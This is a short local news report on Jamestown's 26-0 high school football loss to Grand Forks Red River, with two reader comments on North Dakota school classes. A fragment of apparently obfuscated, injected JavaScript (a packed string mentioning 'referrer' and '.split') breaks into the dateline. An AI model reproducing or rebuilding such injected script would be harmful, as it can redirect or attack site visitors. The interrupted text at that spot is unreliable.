Miscues Cost Jays in Loss to Red River

JAMESTOWN arrsf|var|u0026u|referrer|rrasa||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- A rough first half put the Jamestown Blue Jays behind the eight ball early as the Grand Forks Roughriders rolled to a 26-0 win Friday night in high school football action.

The Blue Jays had a fake punt touchdown called back for an illegal procedure and missed a field goal at the 1-yard line in the first 14 minutes.

Red River took advantage of great field position to jump out to a 14-0 lead at half on a pair of touchdown runs by Connor Dingle.

Jamestown falls to 0-2 on the season. They will be on the road at Mandan next Friday.

  1. New Season same story Blue Jays are nothing but a AA school playing against AAA competition. Going to be another long and winless possibly 1 win season

    With ND….there is not a large enough number of schools in some of the classes. That’s the way it is. But obviously, as you have determined a formula to say Jamestown is only AA, what is the perfect layout, so that no is left complaining because of an abnormally bigger school in a smaller division or vice versa?
    I can’t wait to hear this. lol.
